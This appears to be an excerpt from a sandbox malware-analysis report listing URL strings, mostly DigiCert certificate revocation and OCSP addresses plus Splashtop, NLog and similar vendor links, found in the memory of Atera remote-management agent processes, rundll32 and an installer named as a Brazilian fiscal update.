Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167AEBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlche
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167AEBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedRootG4.crlLow
Source: AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digi
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167AEE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100796000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251008DB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251006DF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2748747455.00000251795E7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251006C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
Source: AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl(d
Source: AteraAgent.exe, 0000000C.00000002.1848517334.000002167B8ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl-
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A57236D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl-Z
Source: AteraAgent.exe, 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1847212366.000002167ADF0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1848517334.000002167B90B000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2393257978.000001A571F41000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A5724D3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57232D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251006C9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AB85000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlF
Source: AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlJ#
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A57236D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlK
Source: AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlQ
Source: AteraAgent.exe, 00000018.00000002.2748747455.00000251795E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlX
Source: AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlfd
Source: AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crln;
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167AEBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlrlCache
Source: AgentPackageTicketing.exe, 00000031.00000002.2962491449.0000021F25A01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cs2.wpc.gammacdn.net
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A57232D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabion
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A57236D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en1H
Source: AgentPackageSTRemote.exe, 00000021.00000002.2945403740.00000230001DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://d17kmd0va0f0mp.cloudfront.net
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251008DB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://d25btwd9wax8gu.cloudfront.net
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.2004500560.0000028A55182000.00000002.00000001.01000000.00000016.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/googletalk/googletalk-setup.exe
Source: AgentPackageSTRemote.exe, 00000021.00000002.2945403740.00000230001DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://download.splashtop.com
Source: AteraAgent.exe, 0000000E.00000002.2393257978.000001A571FA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2455163364.0000028A32100000.00000002.00000001.01000000.00000029.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.openjdk.java.net/mailman/listinfo
Source: rundll32.exe, 00000004.00000002.1767433226.0000000007443000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1913949717.0000000007215000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: AgentPackageSTRemote.exe, 00000021.00000002.2945403740.00000230001A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://my.splashtop.com
Source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp	String found in binary or memory: http://nlog-project.org/dummynamespace/
Source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp	String found in binary or memory: http://nlog-project.org/ws/
Source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp	String found in binary or memory: http://nlog-project.org/ws/3
Source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp	String found in binary or memory: http://nlog-project.org/ws/5
Source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp	String found in binary or memory: http://nlog-project.org/ws/ILogReceiverOneWayServer/ProcessLogMessages
Source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp	String found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesResponsep
Source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp	String found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesT
Source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp	String found in binary or memory: http://nlog-project.org/ws/T
Source: AteraAgent.exe, 0000000E.00000002.2393257978.000001A571FA7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57236D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A57281A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167AEE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com/
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A57236D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2748747455.00000251795E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rh
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167ADF0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723BF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57232D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
Source: AteraAgent.exe, 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1847212366.000002167ADF0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1848517334.000002167B90B000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2393257978.000001A571F41000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A5724D3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5007A7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57232D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5002C4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2393257978.000001A571F34000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2393257978.000001A571F41000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723BF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57232D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A572300000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57236D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2038194012.0000028A6E44B000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2761360886.000002517A740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2385596719.000001A570E25000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723BF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57239F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2748747455.0000025179586000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AB00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2761360886.000002517A7B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: http://ocsp.digicert.com0K
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: http://ocsp.digicert.com0N
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: http://ocsp.digicert.com0O
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1847212366.000002167ADF0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723BF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A57281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AB85000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002D.00000002.2794634831.0000019F9C022000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: AteraAgent.exe, 00000018.00000002.2770892227.000002517AB85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRS
Source: AteraAgent.exe, 00000018.00000002.2748747455.00000251795E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167AE73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167ADF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7Nfjgt
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comb
Source: AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comh;
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167AE53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
